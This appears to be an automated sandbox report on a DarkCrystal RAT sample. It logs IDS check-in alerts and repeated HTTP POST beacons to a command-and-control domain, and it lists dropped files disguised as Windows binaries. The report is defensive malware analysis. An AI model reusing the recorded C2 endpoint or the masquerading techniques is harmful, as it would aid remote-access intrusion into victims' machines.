                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49768 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49773 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49883 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49845 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49825 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49863 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49892 -> 172.67.186.200:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 336 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: 001031cm.nyashteam.ru
Source: unknown | HTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: 001031cm.nyashteam.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:47:51 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r163hsmlEZ0DX9Zg85zDYkLN8MPQflsDvA6LsGla8hiOpdvo69gTkAqMWBrL4Gf2Z2Nrqom%2FJPRMbyowkU0oJNt%2BItVRwN876mPghGvSZiqlUYva3XL02PaNdQzUYMZDaby7psXMBok%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f951830ffe342ea-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=4694&min_rtt=1732&rtt_var=6574&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=57410&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:01 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Sxd7UxESLVQU%2B%2Fajx2WtV0H3HNTu3lLUYP3RZRf1zEmWDBo1vP65xh5ys44UQjslgljhtGx56JS2BJhAlqMxP96g8r4EuJsSN2v6CkUG7ZwyoZGap68SnXLtvbPkpyJQLpexFKBYXM%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f95186dbe2d1a30-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=4254&min_rtt=1995&rtt_var=5267&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=72745&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:06 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Fmcb0Cu8ZrZiRo6MvH5KXF%2FurRZ6uhspH8QePOTJNnmiB5dIb0iRBb9QlqTodKCoPgiRdOZzq%2Fqh7J1l1Z8%2BNQhKqfytiMTxEB8OmvigqSi7A0Qbitx5ah35X7GF%2F1XgH86Esm5Les%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f95188dac14423b-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=3833&min_rtt=1775&rtt_var=4782&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=80039&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:09 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3BdFEjGTtpmmF5qeUaD4dSKXHFck3CDxJpX0HaVTT6ckf5TnrFD7uk9zfL6Ion3DiOR9u8Vf%2Bf5LedgO54uhNwVC8CZZZkSgbdvK66Ei9IUWYojyPwB04OsOX0Zd3lElj7njj6IG%2FDE%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f9518a41f50c33b-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2920&min_rtt=1565&rtt_var=3297&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=685&delivery_rate=117675&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:13 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d54nnMoyjxclELRnw72Vhogz2H%2BEZ9IwFpds0%2BTmCEdcPAiNyd9ba3EWDyJu1wqDuCplGzhH4Ju5MX1w4TQqmmQg%2BvMn2GBHOI5RKY7cnYEQqb73GXvnGNNVjznuDDZ9%2Bk%2Bh7y6MyPI%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f9518bbcb208cba-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=3733&min_rtt=1971&rtt_var=4264&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=90852&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:18 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tcy1f9wSve3aZE0AU97eF5%2BAqUnNSW1P8p0%2FfWF1besIL6DHwdxNHSOBZhEgpAMgIXH3tZy8GERQ%2FGo29ZgP5OIsaFgPrx9WDxR0Qx15RiFRDoEQqyMf%2FgaYkbg3h8xU6L2VLzvQgc%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f9518d92c22efa5-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=4954&min_rtt=1976&rtt_var=6697&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=56584&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:21 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GsxJOGs%2BCR%2FxTCB3GfY931Rifo9vdTLvppvhuFRwBu1TR8g6Oir0HFSe9BjUOgacG08dXUmBuhgLaZoAwgW9yRg6wyZOXUUNcD9OzwxJFoL5tC3dV15Tc%2FL30Rf42CsOST3pYoRj5U%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f9518ece9310c9e-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=3008&min_rtt=1590&rtt_var=3432&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=112880&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:44 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8V%2BwyF1uA5Yp72w8ewnVsedizpmiGLnEvK%2FBKH5BPQWjbDNZN0BUIolEGWY7jR1K8m0H0UrycQvbnBI6uSEnXtUS%2FvO0bW2l21s2kGsSsNTXJvnRPAc60I8auJcij1NG24W2G8SJsw%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f95197ded68efa7-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=6728&min_rtt=4296&rtt_var=6476&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=61450&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:48:53 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsl612QaSVc0G0dqc%2Fxjhqzrlfqeeub3rVcgAQdkB%2F84FGgzuDxD%2Fyhawyw%2BzryFH09q%2BA1fhwqvnqT6vyQmg1d6JavU%2Bd34CpdBTZYZDShTL%2Bt%2FIaMg9o7vMkBD2wftXZzHKXmySso%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f9519b20ff14291-EWR | alt-svc: h2=":443"; ma=60 | server-timing: cfL4;desc="?proto=TCP&rtt=3491&min_rtt=1726&rtt_var=4177&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=657&delivery_rate=92125&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:49:01 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95yMMf7ma3E42dD%2FBGaUArvuFurjVD00Kmh2Lc84eDpsM3ShOL904jZykdR8XW4eqskvOj5jc0oKjc7ngh%2BzIHQF9PpoO6aeb%2BUtlC49w2b4lg3SFiDELvcCnjhEevmPu5eIR17ra%2FQ%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f9519e61834184d-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=6981&min_rtt=1515&rtt_var=11501&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=32265&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:49:10 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EzSfThgCKVTshNWhuA%2FIL5VmW6oMDdBw1fQ9hM9zx7e6IvM8Dzn0iEk6cQjIUOWv3HKCKSbHOJRXMI2XKbC2ODzGDdsjJ08RoJ6fcCBQGcv5oc0c%2BD%2BHpdnr%2FAATaOb5hno7k0%2BgVSE%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f951a1e7efdc481-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=3890&min_rtt=1502&rtt_var=5340&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=70835&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 28 Dec 2024 22:49:13 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7cn30SK6QwT3L4N1bHvSfemvPJDHwqCadhDh%2F5vTEbhHsPMGxYSt9rncXqGLuSOQT1%2FNtlyywGDdJFBm3TLtMtdsnpqJol%2BjUiFa90ivWNmKl7w1oSFd0mP93hsOUp0PR7bSr%2F1I7I%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f951a32ad957d08-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=3286&min_rtt=1925&rtt_var=3444&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=113928&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: smartscreen.exe, 0000002A.00000002.2137127393.0000000003296000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://001031cm.nyashteam.ru
Source: smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://001031cm.nyashteam.ru/
Source: smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.php
Source: Portsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dwm.exe, 00000024.00000002.2180283399.0000000002C43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00426FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Windows\Resources\Themes\smartscreen.exe
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Windows\Resources\Themes\2afe4ed40d5a86
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042848E
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004240FE
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00434088
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004300B7
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00437153
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004451C9
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004362CA
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004232F7
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004343BF
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0044D440
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042F461
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042C426
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004377EF
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042286B
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0044D8EE
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_004519F4
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042E9B7
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00436CDC
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00433E0B
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042EFE2
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00444F9A
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B780D48
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B780E43
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9BB2A002
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9BB29256
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 33_2_00007FFD9B750D48
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 33_2_00007FFD9B750E43
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 34_2_00007FFD9B7B1141
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 34_2_00007FFD9B7BD233
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 34_2_00007FFD9B7B1175
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 34_2_00007FFD9B7B9884
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 34_2_00007FFD9B7902AD
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 34_2_00007FFD9B780D48
Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Code function: 34_2_00007FFD9B780E43
Source: C:\Recovery\dwm.exe | Code function: 35_2_00007FFD9B760D48
Source: C:\Recovery\dwm.exe | Code function: 35_2_00007FFD9B760E43
Source: C:\Recovery\dwm.exe | Code function: 35_2_00007FFD9B791141
Source: C:\Recovery\dwm.exe | Code function: 35_2_00007FFD9B79D233
Source: C:\Recovery\dwm.exe | Code function: 35_2_00007FFD9B791175
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B79988435_2_00007FFD9B799884
                                    Source: C:\Recovery\dwm.exeCode function: 35_2_00007FFD9B7702AD35_2_00007FFD9B7702AD
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7902AD36_2_00007FFD9B7902AD
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7B114136_2_00007FFD9B7B1141
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7BD23336_2_00007FFD9B7BD233
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7B117536_2_00007FFD9B7B1175
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B7B988436_2_00007FFD9B7B9884
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B780D4836_2_00007FFD9B780D48
                                    Source: C:\Recovery\dwm.exeCode function: 36_2_00007FFD9B780E4336_2_00007FFD9B780E43
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7A02AD37_2_00007FFD9B7A02AD
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7C114137_2_00007FFD9B7C1141
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7CD23337_2_00007FFD9B7CD233
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7C117537_2_00007FFD9B7C1175
